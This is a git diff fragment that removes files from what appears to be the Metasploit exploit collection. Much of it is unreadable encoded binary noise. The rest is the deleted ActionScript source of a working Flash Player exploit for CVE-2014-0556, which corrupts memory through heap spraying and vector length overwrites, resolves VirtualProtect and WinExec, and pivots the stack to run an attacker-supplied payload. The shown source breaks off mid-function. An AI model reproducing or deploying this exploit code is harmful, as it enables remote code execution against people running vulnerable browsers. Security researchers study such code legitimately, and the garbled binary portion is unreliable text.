zFTI)SY-cb8A0ib*IdgP@pBDZO7RN1C4?V zkJl65(ahjeV#48X)|}3oQpX zCa>HNwgnw{IdXi~!qM<@niRuQQCYv*z*Q5fkIEF3t{7y}PiG`&R+I)Rl_MwX86Orc z7V>~u#{Uc#$cWX6Y*>~Ly$N+;QcrU9gRVT zWr-2bU|7f~k{BaiHf5aAD5M%kR5D0HB37 zz|&7LPbu;EFHckoe@dfj6aBh-Khe-VBsUy_F1;rDM&9w|;c;9`ON5iNm8^uq-fvei z(pD^xa?-_9ypr7yoR91Qf0NJ3>H>K@3rFPL)9G_|z+VZ@j8srCqPaV8sS{MD>u%Ua zKuo5hxjaf#=Ud@ELtk^Wu&47T{PFR<-SuCS2ff%IVBvu_Fq@GDEw<}M&=GKxyS4Hy zRU&12_~Wx1Jh{f)5WaWY&d^l~nX)+;le*lK_wEX}Al>?6@IcaF2v#Q>TOrI_fu(M!L(-8% z6M$x-i;`-W*-znd`omM0hu}E4{yS^Pa=jIB%redxwYEiC%N;S9JLhL7hJtj!P>t*Y zivw2)`B3Z0IUAsje^_JZ(z5Jl+*OyRu--ph?#k1r=ErLkDW_PfW+=y(yp{_sMfg;r zVGmwvvVQLP=G}zw3v6N7@c-$|+Hj~#uN1T6DR`=x^8_;T)NaR(1C=eTwD4 zuas=xa8Wu&gd0srVmB}sIH3!AR`VV6Sn%t2oqeP-lccp37ng0kE(3v@7@k={fw z$XvU55`-m{$~{IY6Gf;K1?HV)|8N*1kOr>1e{lY9!)m1Igo8Rn0>|UEU5bO=V_J*% zsOo4`uwU)L<8cQ>l>I8c4^tGF-Pyf5s^o9K?6kE>-rQhT$McX?f!3`LWxkjVs_X+? zIY15~d*@E_ndH&f>^p$F&`EBZTe*l+apr=B+0M86)=Exl;4EQ%Yg>V&GGfFw{zy|! 
zf9X!NvT5)^BOCxss5=nAGhA05_vFrIUi>ip+&Ns^c(H()nVC)5?EfX>9@S4u{ha|ANWA`I%%fi=FO+D*xc#1 zZcq0}aF!vc#&+DranNwosO&H3su~K$lrH=U(90&UebH2X$uWcGrydGb6_Xtde^+h3 z?#NLYdT*m*WRyx8x(A{19$fiOXb?_3+3icIwin^DMO^2&3dX(UzY3sc zC9?6@IKZj38RHVX3U(RHFf7M{2H(rbX!SN#gAY6kCtoSu!oe3CZGsHjTD*dt?rPU9 zwG;2+RwevuJP4VYPUhRfhlgKsf1qoWgEII;lPg%8^@|2oBLUk&d6I#E zty1t%yA-@*JEBxh$@;{Hj%gsz5$0fTu1ingwWTuZfQR`T%l5IFOV^E8PYIIK2=`a) zf{~xxkNLB*vedO+g}_FhBW2?jm5{;LAH&Q`Tyu52ntJa{h5`BF@hQ->e^Je8ED`?1 zFH_09)*^%9Q<;JOFgqSGfLXA;twOlUcEogSfk4HKjYVZ(K2>Xq&5LA{5te3)rdv!a&fKfqha| zs-z)=9hV%T0g>J1 zob3Wc3S8)LTaR%@cWMh3LfW8LeM=g09h_hIemOIb&PSrN)OH;i#>&Hakk4k97)lBK zY@158*6!|ZIJ-arwgzYXIhv0HGB!ahmYM4gxqRJxB+1|^IuNhbfBt6!%^5l*onT6f zJw=>g#L=j$e)3B zt$Lmy=XQ@f+bk z1SQ4#_C|wg2KML@CNi8fIs~;>#QsH?PFHdODxjxe{D7>frLx)oKyujh@ zck_^ge{&@HlfXxen>7#+Lahf|AY>G+*l>jq=}YqR68X&^8^Ffok~*!HjSUn11i%c@ zH)`v5N1@N!!Hx}I1fZ%=aytC>gLT*YFy^%ulfBcx?1;|73^zH)Z2U?7nl*lq{iYC+ zgj%Talx(L}NojH59rHDQo&g!#jN9DKY43x*~Mk7o1GHLyg88dOH+hU?(&J_bF1b$Bh4@mD9Oc6tO>(sKYqBvo#R202E9oH0jX!M7( zY@CQ1jEld@39kyO9P@o|+?8U=Gtm8+`qUbiD?6yhd<=-OP;NP4$3VDzv80M z@<7#@!3`r&#+DGCGe7M$-C!8lEwD3~4_?r_Jb6~~e8J_wwiQ{G7%U*S)xI0~9YVuT zY`wLD0rpdt_EbbxT#s<1!=y4j8u5ebF7)y&Pe9?FImu9Ai4@z(WCf6Xm; z4Io-;AiAIjY3W*U80PnssfAkga{kBe)v~r>cvoW{csY`aOK#gtfVb87Pq0{A4>b~e zXWl}pyq}c`PvG86^O)vf)L_}YLK%pzO}bIM^iPw)@X^xtH$p5n*?I59Cf|qVn_7mh zk3#LF2T}D0GJ_Tl1=8blY_J_Te@{d5O#wWMNW28qi%%1xxWb}7d~NaQ5R-@nbGaEL z29LOG2=5tQTA8ZrWZgu_NIsr8Zf5)3frrF~9-r_uMsv_}g5BDV>L#{4s4TgfNnhc~ ztawgINd$o4_P`gRNE75`RQNI9pi0zL#GQ}9G~2S}Z**u^b}@XA{=0`Of8^1WZ(m8V z=KN>3R}c{zD%iKe*|MSI)Yp;&kcvGWZ22|>IOdiLcmlBfsa6;+kTv@kDbK$R&jG|2 zw2o>RK7tQ``4GM9Uhz^w^F;m2w^y8{ujRuBCXvlpS{OyNh zC?C5z!kAxJRY_=gd)h}{fAY~r2r1?(Fwy{>o0nGS+%B6L3+xf1fjB*3Q`ytxpihcK-*}T%GLKC!hE3A5Z#!%# z)FJXA{{{*x?ssQgAyWoyT|F=O++GWBi?bj*y=5!{Yrc1Uz}vmsfB%>YQaBNh&yIKJ z3WD;(1FdBEb0P~kW(F^zIIW(GGz#x68}8?|$B9q3Z>!DtLQXK#3Ry+bj92IR%NS_R z)^MFiEh*M0=-rMD`Lp;Wx^JkaZF}$fSQgfhY$z-h6?@eK0hGINg{OJmnJ#G%>i&Za 
zYZTw=3_B!%to4Qx@zyF^}0UlA-C#lbDsM-a{mGW(sPv>$KV{s&~3)X zI^Q^M>ILRY8dmx$X@(${+&QJcN%YcVu0s?v%VOR20}AA!2Cjjpux)CYW0UiYGDYi@DKYnF*7^mPXt{@SY%^*SO=ZC9 zF4n27Xzb!vfA)aI_*tIv<^9P*)+BT0gnAjpUz(6=!Q|KiCcr*yzm*#`#*s?` zsoCDqgD=dh;r2WI`mB7JZ}FTH1tZY*Hg>atM_Au$mfN^>7yJEv$k=1d22ry5=O|%ROe^eD-D(;tPW3ZHXO+3$!Afu0A zcqmgGsF?QzKt*vgRQntoVSk_opm%*8nW@P=6R#@b-d;46Z5Rn9GfFna?l~q4yFwpf zLl#uQ*F{pbhKwZWx&)PYH9Sh6P;e40A2a)#B>u4Lx|_$4NwSivr3FZI4_ful(=9W% zOj&45f2me=;>3jiPX^@C>kjIQ!sisN17X&9?d3Mx)`$%t?soDEM{*^>!PIw3Uld)q zF136Zlv0$D4uf;vA86+mWPwtSK3u zF|XlPrlK(N2;IDUeoZGc<$1`nR-A@HM*dzsW;{%(E5fLW2@gvf4|FN!ttDXOoBS^R zW#k;44cPGR{8W698^c|=y7P`9um6;aBUKSP%RzUt(*^S@`ndQAM56v!SA!F*R)Ea;Tya(3}Kx#(_2!61oY?O#c%W znr=Slj{>pP&xAIN@9|f2IzSoy5u%p;f7JV-%6SwzD1n)Hq!*Xk5D1~iO)$!;^4emS zt0VRw29&=&QROZBi=SC#CkxcJ7jmbv4@s_Dp)9}P@5~7OjWamu)IY*=!bW49dm;{Q=iiS<_VrA>?Nwe?Nz+ zKnk@hk=W_4vSWEn5HDF|;ZRhXzpqqUT3ST`D}}v#w7z;%aOTAtfZfvJBJI%uOa`1D z#jWe}g*m@ z@&DQ5e`vv4;V0dJ9-#3Qd-+ORe-T|mg+}Vmd7QiN=XFBFhel~^Rq9duE2HuKl%Y_C z@s^rIXN0a2b&>ui9iS;j#RXSs1V<8ce0M7vT=qN*TDw78Y7Mx&ux<9YRGQt0vYS<$ zXFp<5Eba}YQ?uJ%waQai_j&5u6GVNck{7AYsl+Ee#E4E$iyA^<>I^W7e@j(uI~5Eg zxJ(lWTf?g$jM|IdJeqi*T^EkkqoWj&BezoNeF`XG7t2e`uF1jq8W6`biEfzkpdD0_ z5HuPYn+VQO^{I6(iwcA6EPMI1Xn;`MCnhw<@azYX0q=pguvisKQM%no`(bG?6Fhz8 zN!qFOq#MWqM=`8XbGx59e{6S8$&UE5B&9#!jiT(5B1hKh*+n{njyy7T5-&%d*8IfmXR>4ltAd2if8I)<#Wp=l7FmUj z6{xI*MY|5x^@H6gC!!2MT=+ksL6(gU91j#|IuQRpda<3i zX@MtV&jY5MYXlKBe>uUf4{<`ni`d~)gEwj1n(N!5kaI9f!zzIsZpQ$?tyTc5!aS!@ z3OB;T*0{}OM&2RWx6a5hTZ}B+h@#TZOA45<@yAl}KD5a(!nK0{08~b%*kI3vdSe*#=+}n_ZyAGqg@un}(Y7BPvKg$MM0YL7&^QKq&rof8Sd00h;&Ekbl~+Ae)?uL||+e zFQOT+><1HW^X!jRC028;i-A7cK}Cy9W6XT@>3T0^ z5crdWf8e`)X;@}^fL>wkEeXPz%U ze{h$miT_F*{zV0z$%IIZ72&H)g^!`mcq*9wP$XNV>?{bZh@D=5uVcYB_lN$!*zY~R zR?)gaeI>4c({Av5y-|7;L`Y@-tS-961H=W={hH9n6cMHWAg7@^hKr`i&i~3OojPVk zRQT98hSJ=~tY$ZH%=O_e^;d(;kNZaje{@6*ta9_3tUIrBP)K%!_^+;-Fi9e%HpW?C z$*#ddb`Y8{kPII!v>6dqLG+CMX)xEt0JlN!J!5}rxnf2?Y|;KR>3#5N$2xYT2kq@X zXvna9W%7**U2ibS5?75bsal#x6t#(;C|hU7qL7RwazK^`$fu6v%01e@ 
z%NCdSWx_AAWaXaqN<~p;5)#sPJB2Lg;S3gwLBAu@x4_Js&2EHr33bZWA=rks(E+dO zskm`{J8&G|SzT`8}f6z)a>8zCZ z5`vI0WI;iyC;G2ET>n8gqp1wp8Sk-mkd|X4R$;XFLn_N~$tQ1@mj*_Ann7* zam4*l6hicjl~4`ZczfWpcq57ykMn2>&p(_>gEb-UD(YAwmAGDF8azn)iN>8c8k_HI zF=Kf0U|?*wI{_q*e-BkNIam~y|8oSI^;WZQczT}>1xOAUV-s&&9^Z(-0Xv5AyzMgP zv%M8(As-6k9%&=gp|RJP?I5J#59%|dBSU?BRvv_p3N+f}K}>Q+?+NjgY;IEvF=E{0 zgt`^L!!6P&Yr}-IV4b%Tqog%u*2HJ`ZZT8ntTf=&1lqk_nNANY<*&UsS7#`s_)xLC}bE|TtEdu$AcNQ5!OoHngQz*2vS2#%o9?34!&OrgE zQHYg7PVG@?gx0jfR9Rzhpb|_r-)&%5+BzbMe!&G}o&E?S()qdl5ADr>&}NWC7we(h zWs7;&l9Aqdf8w0iLZl76Hd9D?t_4;k^~5>gKOq;>;wnD5$zX}9Gvl|`*p{{kC%)qzF*wm?!1bl=d}{$ zbLh)2zXqg(?Q2j?==8r$!oD{vl^|TwD|$f&b75Jrf1&xUn&@zmhHnhxSuPpD{Pqt6 zqD6!ndLQJkTl}|Ecb!_Z2j-PdXf3W`s;cNLahFF6i6>O-dav%jbMiB|}Tm}a_#L}<#tspHubCdxvD221$g~m?h zjTB&^OY?zXD=dX9t)|IFFl&kqyjvkeZDHDlmV-adakb(bbeGu&XV9VptCm-HW{t`X zND8JSnp)`6P+H%jJFojlP}~A;)7LBGe~g^zh)9BWnsoGNcggXtpc<0^C`fJC zC-D41r!)%)k$K60-T*M3@W~xW*Lqh(u0AG)Vbf|6Z|e1Q;Jb^@Y5d$h$ChGDZ@5z8 z2G{n6p7rvwGjpGk7N%%?eqPTG@;U~&{|N&>H=19o48?C9ZVDQF;MZFefeU&jySU8L ze_%~(vOREbhRCzofo?tXx*NwS5-d=b?`d}@vP$^P0YHM(Q|mqnbSuV3$n0q?Va#GM$KPHhC@Ns9b_EDuo4E(!`W#-7!r##}0qAt^MBe<(%u zp>%Qy_+oR{`>?o@2v#XAsUxdc92G_gim6hvg>+otDzobV1rxQGi2yK`k4n*k0(%F# znv4~fn4PBW5_OReRdXXR8Q!i%g)G7Y0)fLK;IyA<0iov; zdUPQB)ZE&=Ne^8OY@>g!TQecxf1L*~!Wl!imqVIpK(lR;>-;lk&OvMim;49lUIRi< z$YydzDN+K4<~aqwcP-YNAVA$Rp%g_tWCO&%b0i0URwpAVc-kQ??)Q3{hpk9^-MFH6 zE0C*AKa~BYt0B|If`sEEYZ7?dE-e%cEU~9LX;JsA*-G>Z+_b4$#n+t6e`L;EE&X0v zh3DJt77|?=Q67)5;LvZZCJvooiY|$M&Za1kkjKEJ*YAH>ge@$c)jXXf8K$7oN z%5}h4(!ZtWiJb#C?ND-la;#pXmm2QvpT6T;su~rza#{l_K@`BW1Q2Oeb+O;4)PRzR<`boILDe^CwCU0+B=bvmMPB!hF)h>J%GFFMXn}_3PV9a@naQnsP>n}0 zH|eh`myNv97LgYHCX$>?l7dGB3s8!Juf?=Xx99zxLynIH#5j*9M||vkj~73ckP}-8 z^TR1q+)Sdv%8$-1t{``XcYH17WMhR`)_6X5G?ZX!9>qase)CX-t*0Eu=>jH|N78z=<&a}KeI>|ncKJK>A~`Hlb7@tL-(JNmFD>sO7-|R zjqutW*jk)3)7$YEDn`fVRQEzIKX7WV^J&R2J4I^~Gz1KVT<72p6~-u3lXk`;(ar$1n);YC3q0Xt zlVk78&mRKL59>dFh&oT;-1ZhD5hIQ%1XaLkMEfd`J?M5*%8K6WTGRv4e_VLn>W$I*)xMJ{!B&@}zr1bb1p4S5 
zr2@ft4xb9vs$oIbOu!HLpv4JCDj5oX3;K8*!_u2x0S;U-c5Bd@WBc@l44Jy zRRBYyW+`V5Y;)fdu4|h1b>_=yTA7}97lqn<^LNFMb@OGt&(b_q{D%x)IxB&}n@rT| zf0f4$75m=`*de~bM6RNENw=N@-f9nEgm9U;B}Ff9*uU+J2kbmZtH#qxf-PGE&SfMj z*Vw2Zo0>}Cg4(PN}M(| z6q96Pb<~jZJlRa3(smW8`oyVhAlWV1YS@4dh4-YvrFuyY?|MKzqR%P^Wz%nvC9DIh zu|`}O;;Kqi4q<#I!8tV21@hn@c{4c}7zYQDT3x;m>BC@(Q*<9pq*+ziFS;!be`fv_ zjbsh+g^cx#6hpH6A!;E4Z$Z!PI__1Xe>2kL7a$vjGx8n?mZ>3iq$A%A6|7^_s3Ul1O=A8md-1gPCN628Q(K?ZPPrM#aB*7JO+@#aB9J|Er8#N0x zjK*MUKMxx!Ys0Y*|0CuhKv8rFf8Se9R<*}mYIO_`!ye#P`0mv%9^qVE23QOP9SA0Y4b zFx@3s`j+Y}0!XXy=7S{;sD-(bATMs@P@0sRB1=+WK;)51alct$b4m$ze|PH=Ht7H; zTU@rewk&OA|06pn8?Nv$M8kx|(O_=h8&cAo;%T7#(T-6v|2NU1ETaiG8x9xWB%@ev zS&N<^+_p;l^v)6M+uZ`snRQghXKW5F`ag@j=@5uxwJY%^O;FA~Vrms3=*Lx61pKET5ne}P|s66u4xs1`c#Qmj$Xm!SHts@o=OS{ly9K%=a2Jde9; zR)MpPuIlJ+NyQX988fPFzHW(Ddf42CNphI;o)dkFrL_pu#y6>KB$^umYoiWAZFEl= zMX}-CF|UBx=_Xcs2jWOHOYyl?&PP|qNCiBlF1DPb_MmArgYlBPe<9$!fZMSSu>VM> zg2;N^gh0kQkFfzC);}~bUShmZ)nY4D1n08Q3fyF?Y+)RYo~}n@bx`=@EpmB}ptV&? z(wrdGc0z`s^;T}RTyecatk_0u$^Xf&Z7Z_5_%Dv5e(YYtN0Rzx{@=AF+{l{o#2j9N z2ozxsZuVjeLHPB*FsvNI+>g02NBZB<6zLybOj?91(bmlTe^~Q({@%uf2|Vo_-^)l2 zg22vF-+KDq3t`GuTn0xlr4PP2^Amt6x0g07Fp5*Vt2i2Xs)86!dvB0(cZ;(%$A&ML z6kI^10&%2@-vyzADt(^J<+XRzb)`3gEMx03=MW4c)zu`WWf zD?m0I3hv6If7ZK?Q?u%Ip9#iKXs!4c5gy%m6#xUwIM~`qpBUJwIf4LRzudLKY`oCHX{-0a!5Ekv;TBAbh4_aH#b-IyX=uF!=NMRQGBce<#KdHs{ zL;O1#p9X<`$-Hq~)H(u3SgybBF5K~RbH~7@oupknja>4r$95mNT3>yq-w5Kfe8L=-+Py^o`!K@^qb&^` z9j`v~xB+xP-J%dWm7R*8{IA=iqW>9W?wyon*work5zwZMYCXtGP8N}sVqs=Ll~sMd zaX30BHFxzrhc-zypFyTRhrq<1k3;%Xh~M7iWcuIsx8&#ft@Y)dbQUCt?_DHR#MoFP zf4Nw;oP@g*=N;IdoUMwP4OWPu3m;KD@+5K&Q}~OMVT2XY;DvI%b`5E zAt|=3qxq8z`-gX3r4$EmumQ{N4+@puf2lDQdNlpYm8c_?YwV&u3wL6_y6~0ff|QQY zX+)9-y4D5PUp9;I{2_%2^`JT&=*l>Uf#y`0~hvIIK(=EMO(Q_4sn^xZ;-fBIuW zUzjO%P!g-udn;bgT+X<7UAdD0yrovG<5SDjY36J zK&IBZ`wlpQj062cvHcWu)>NM=SS8g;c--t;oSvCmk2NGC0dAe-bK*%x7z_n(_if04dDJX=BP3{W_{mG_^^N2bGcCY^n;E1X0+78GSs z0Q5N=m?_x>=Z!_c7Px&yrG{02xCNPXX3FA!g*#h^0R4@jwOw~O=*A2}pqRZ3CLW=;4jNl8Ecn^0pdO~67Q(;G%A^fs 
zQgkmUF)C3AWcj>jx{vvWcn?L5WLaGjVFMse#$0kcNdS9+_hGAkALEKcu4HBE-g`rV6pc$^CkP{6jR>%E!rjC_VIk~Bv-7_^`k zEr#Op`oL1gn=O;kf6jsw{y(m1tW;!u()~4{EBKhYb zV?=fYh>AVwe|pvxCWd)|)(NerGEB>ux26UX-&O<(Qpa-1P~!scWX?Z7{S3?m~COw@T+>5|ICVW z`N7O7%xhcg!nFJA1fhIv@s;62R{e3QhIE}lBBRDYe;knIlU`pHH;X8_^TM0SsIqiU z5AE{8<c#X-vZM9I)!Zp-wR=lEaTQ`RgTNsC&+uu8L%o|ea8p+!@ zK_*|A3>f2SB8;PTqsR?NJ?JuZ=i^4FypBzM-_kHFwZ9AqR>v8!6EAB)+idn0eYpm4 zp`4J1e~r#Cq`Tom4v~uj?FM(&`{gh3)AL1ac+lTG2VXBkN#ovUX>g&ht`4oEll6r< zL>YLd6cHjTs{%mFe?+I;3yAn+%&60(k+I1A+_Ygj#m<@R>|4D!%k#@3s9Fc9iq$!+ ztNVlVyI~(d|2Vht+G+9MD*5acbNls{@mtQxe|8FraB@EGIi*$iAZvGT9Ej4LW!*EQ zECh>}t0L~5(V^DAJ$9(+jq*%d!5HO#Q|tx0XAql8DbOk!*&B6yNRkp7-p)O8{k}d& zSgX7965>Lq?k<&zG*0fXw^2jW^A<+}xN}^IlFnas}i^#^ojC9ThEff0EywwqbzGl`?}pd@~5ddDle)EB~l zow)y+V^^T_T1Z2f`t@E-;O`n;mL7u|f9QKdny|JG5+eoTjsRY%1gaYiwr2dx z+IErN@Aa_!cc+X3f2QF$Ua{%(Fgm$HCb^>T^PaPO2{AU=Nt$F`r%j!j=FizNUeVlu zmBN~x9uY?Gw^8{Nd6Ktce-r@+caRjc>6=k)v6vn`T-L`F@ddWqI^xu7aqs(paxvTd z@9{N(6m@%6<8Noh!%a|r+lIH1bvUdQH#q5Qx-ru+uOOb0f6{jTtC84#-0kI%2K)q1 z^66RShEi?CWA};Iau=l( zwrcYHtm9}Hf5Ey)&qnUK87Q*%>!n6tgb^_ z)dTV?nHTR)Fh`ES=I)3H%r_@2-n~fVjo!CUKPA(#02iYCR#PISXR^ z4wzOlJrlOq&2k`_mIkhVg4gT=mhbZ&$=+99@$eZaDS1|B(SG0jJ zDsO<~GBj0r5ylK=QWzx>->_f3PFOa^zT$Ry0#-XEz2^Hu@Q6eLVlf_&de@**76p)7 zmB18x9XNmI<8qR2`r?w3;|-`WTfa)%hfw??e=u17UF}y>jrZ@;#$yl65DSz8VyaoS zunT?JF@UEF0&9jnf>vqu0sI$0bNo-694w}Mf{hcw&TvZRX~j4`!h%hf%y$Y%L}O3q z**fJGuj@^Cw$GkFeaolBK6z4>GxiZiDE3U3$q?9h^9Z(Unhe!dnV3fze8=A>r}p%v ze`99h+m36FEilc+IDx8K{qwNatvw=XFOlI}AXLlX35-cA zD}Le?G=vJyMeR4Wg%r_@OlE+>2=h8_G0xj0mcgcAYB!b}ocUJR4=99aq&qK&66v;r zX-AA|IG~0kQ(8Ar;h|{pyfSMKx~I!Xe}vCOjD6W$Yy#!s=iV%DU%FYcKaRzKClOb? zLy?hb`Z{Klya6+Z>lkpLYW+3PADv>t@G(vNz-H*P$CblZ_{yydYQdKFd}DgSS18?`53}M-ZxTI<{TStVyU*QxTr26^e-qU! zmi}+s*mQLQ`XwBe;#w1EtIH8OexH0Ixs4AL>Nt8)iWJldZKDp#f=2l~L}@r63R=ZA z6m=(MVyV|Zg^N}>ptUi?ziEeWjulJ*1gCKatL(%jEIpR<(5F^RZ#9k7pTD|(+8zD= zV~xcqsMgYaenlDRIR#wCK{w%Se}a*8&#G7n-Q2JychDR=^;x(G_h#>E3`KHy8_^t? 
zL`5VJSK6)kLbMqNd~p|0;d^oHvhC#~Za}L{g7cExhW6&^JP@5=250mnUZM*oIqU9B zqa;tRymtX~=Ii8~hdf)dz>zK2@0>*|^ms$tS{R5Qd)g%zierxzr%HhOe_KSSthM<( zFAN|>Z5E_Z1n%Z7ZnTNnRix5GDxMF%_#upv&l;zhd27Y^j{#LM6@h^6u2C6}NhTky zga$7F4NaQqKD0D+VT|f?IT;MJuuO;rmpP&yjTs4o$2)v6nx3L;IIN58=EcDOatLpf zseWl@Pe;~G9g{RoMtyYDe+_)hBbNgV4fnei?rJDJb&RbizrZ&#R*RQIR=7Oz%PKc0 zF8fNWQ&ViI+4udQEyAdZGKQ?srI^~)W_MEpi)>97ym~!NcG%!wv|CXfSP5}j6#x;R z)R#cK^`a%T0tM2lsU+GD_`i!kN43=HF_Q>$98$`hT0kgcisdk0e~}*CIY@7td50jG zR*oQ#bgM;fCV=X?F_r*pvkD~Ix&toNaDBt{GA-|T18)lrZv~)aQfFhBu?8%Uu%@XL zvaxx6$;Nf4LsuRpVHI+0NGZ@@WVh|683OFei;q8V8@%=5(TP%i_2^bir&|qy&);U??6dZ?eF#oZSP1$Ex2!R`QpcPdgd^h>caAg) zO?oEl7_%Rtct?Cd}?E-|Lv2-MI$oBllnc$X)RzQ z)i3Uh>cXg|7(V~AHgYb_gQy*+?(_QNhDiv*EJF3up!*dU%A#YWWc!o=zNd{?oi(zD>_!pe~Wcj@RyM9xG(p7)G2Tjm{+gF zo_gvy6R*&mZ=#_SfA+&0+>j&I9A$DLLQGJ;rmQa4#fvg!lfOa z)JRx`0HHuVe+Fe^{Z&?R)!){dm4VE)+vsHAn8lQlg9pSs?_i{V+JV~+nU>;4^gCeLb}U0tRV>@&>DGU#gGmWZlGspgK~ma8_kgyJKVxlq1NmO;qCTkcH&faZvCPT)<50x zo9kjoJawSZy=4IhvP?!#wGr$pE%UL`tyV4NcqOyf2=8T+@OeJi?B+`S@%^taGC~L| zYg1ld&3-%a6(NKP;z^II(9MgMR5&6B7_~al6bZMQ@ z1zmvHM}>&mF^aRU2}`hBSgIXpvLr_=k4}G~<8eWGCExS{LKNSYOU%%@nIP`Obtv68 zB$^w+2HCE6w~Bqh9k9V zYguAR=i4!pASa?p{*VF#QC*Y6e=;|g7`&q;208v5RFey zbAQ>k(x5Ymv{aHBW!-$WMO6T-mTSpUBZxth+#~2E#cR1?-SU&Cs7)PtelxJgmB_*o zk(p{_s{>KI`JvV$cljP}ET(YW79ZVte_uKxL9fWdQ1sIPcJ1=F8!=F#rmy`)qrNY3 zArjXzXQbUbbN*d%(A>A(O}5`KcqtwdZh!hcG=6$vaGg|_S(-mp1!ojSd@y%Yf?4m@ zz-lo;Ddi~!J)tNNRVb4h-8G{_N`!?=_$z~#pQE&(M8jj|U87W6u3`S{ihZ;OuF*lF zGos%z$S;<7A2xzkyyVX5v|-Xo_{P( zM2|X0i+t+$$Tv$LLZU@SJ7v!x86f`Cizj4}E&$><6L{vyYKNr^6!kWmw5hw!ve_65 z(fvzg<9xcPcY3rsdw!fgL;H29ZvyO65MIf)fIA9W z{%2EhaD5NgbgLnilcYFDJ#&IDm45KWUfw4K;-af{_K% zrLxq?)YHjc88~3k3aX%SW;jDTGF@gmI7+)AZ#(AJzf5X`oEK-IRkKH0JHN43eAr>q=eWP`EL~OYw@XU9+DNatgh!gWevTD(? Q(c7Jvw{Q>9|NC(8C<-(XjsO4v diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as deleted file mode 100755 index da6482075c..0000000000 
--- a/external/source/exploits/CVE-2014-0556/Main.as
+++ /dev/null
@@ -1,185 +0,0 @@ -// Build how to: -// 1. Download the AIRSDK, and use its compiler. -// 2. Download the Flex SDK (4.6) -// 3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) -// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) -// 4. Build with: mxmlc -o msf.swf Main.as - -// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/ -// Modified to be used from msf - -package -{ - import flash.display.Sprite - import flash.display.BitmapData - import flash.geom.Rectangle - import flash.utils.ByteArray - import flash.display.LoaderInfo - import mx.utils.Base64Decoder - - public class Main extends Sprite - { - private var bv:Vector. = new Vector.(12800) - private var uv:Vector. = new Vector.(12800) - private var bd:BitmapData = new BitmapData(128, 16) - private var i:uint = 0 - - public function Main() - { - var b64:Base64Decoder = new Base64Decoder() - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - var payload:String = b64.toByteArray().toString() - - for (i = 0; i < bv.length; i++) { - bv[i] = new ByteArray() - bv[i].length = 0x2000 - bv[i].position = 0xFFFFF000 - } - - for (i = 0; i < bv.length; i++) - if (i % 2 == 0) bv[i] = null - - for (i = 0; i < uv.length; i++) { - uv[i] = new Vector.(1022) - } - - bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401]) - - for (i = 0; ; i++) - if (uv[i].length == 0xffffffff) break - - for (var i2:uint = 1; i2 < uv.length; i2++) { - if (i == i2) continue - uv[i2] = new Vector.(1014) - uv[i2][0] = bv[6401] - uv[i2][1] = this - } - - uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000 - bv[6401].endian = "littleEndian" - bv[6401].length = 0x500000 - var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000 - var main:uint = uv[i][0xfffffc09] - 1 - var vtable:uint = 
vector_read(main) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff) - byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8)) - byte_write(uv[i][0]) - - var flash:uint = base(vtable) - var winmm:uint = module("winmm.dll", flash) - var kernel32:uint = module("kernel32.dll", winmm) - var virtualprotect:uint = procedure("VirtualProtect", kernel32) - var winexec:uint = procedure("WinExec", kernel32) - var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) - var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) - - byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable - byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main - byte_write(0, "\x89\x03", false) // mov [ebx], eax - byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret - - byte_write(buffer + 0x100, payload, true) - byte_write(buffer + 0x20070, xchgeaxespret) - byte_write(buffer + 0x20000, xchgeaxesiret) - byte_write(0, virtualprotect) - - // VirtualProtect - byte_write(0, winexec) - byte_write(0, buffer + 0x30000) - byte_write(0, 0x1000) - byte_write(0, 0x40) - byte_write(0, buffer + 0x80) - - // WinExec - byte_write(0, buffer + 0x30000) - byte_write(0, buffer + 0x100) - byte_write(0) - - byte_write(main, buffer + 0x20000) - this.toString() - } - - private function vector_write(addr:uint, value:uint = 0):void - { - addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value - } - - private function vector_read(addr:uint):uint - { - return addr > uv[i][0] ? 
uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] - } - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) bv[6401].position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i)) - if (zero) bv[6401].writeByte(0) - } else bv[6401].writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - bv[6401].position = addr - switch(type) { - case "dword": - return bv[6401].readUnsignedInt() - case "word": - return bv[6401].readUnsignedShort() - case "byte": - return bv[6401].readUnsignedByte() - } - return 0 - } - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + 